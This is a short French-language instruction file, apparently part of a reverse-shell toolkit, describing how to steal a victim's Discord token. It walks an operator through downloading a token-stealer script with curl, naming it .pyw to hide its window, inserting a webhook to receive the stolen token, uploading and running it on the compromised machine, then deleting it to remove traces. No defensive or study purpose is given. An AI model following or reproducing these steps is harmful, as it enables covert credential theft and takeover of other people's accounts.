# Programme réalisé : Aucune idée, mais pas moi 

# Entrain d'être écrit, via ce programme vous pourrez mettre un webhook discord est récupéré automatiquement le token discord de la cible

# Etape 1 :
# A faire sur votre VPS
# curl https://raw.githubusercontent.com/DictateurMiro/reverse-shell/main/addons/discord-token.pyw -o token.pyw 
# pensez bien à mettre '.pyw' et pas '.py' pour éviter que ça soit visible
# éditez pour mettre votre webhook dans le fichier

# Etape 2 :
# upload [Chemin d'acces du fichier] (Regardez le README.md, si vous avez besoin d'aide)

# Etape 3 :
# python token.pyw (dans le dossier Downloads, PS: Pour allez sur le fihicer 'cd .. && cd .. && cd Downloads && python token.pyw', CECI EST UN EXEMPLE TROUVEZ OU EST LE FICHIER en utilisant des DIR)

# Etape 4 :
# del token.pyw

########################################################################################################################################
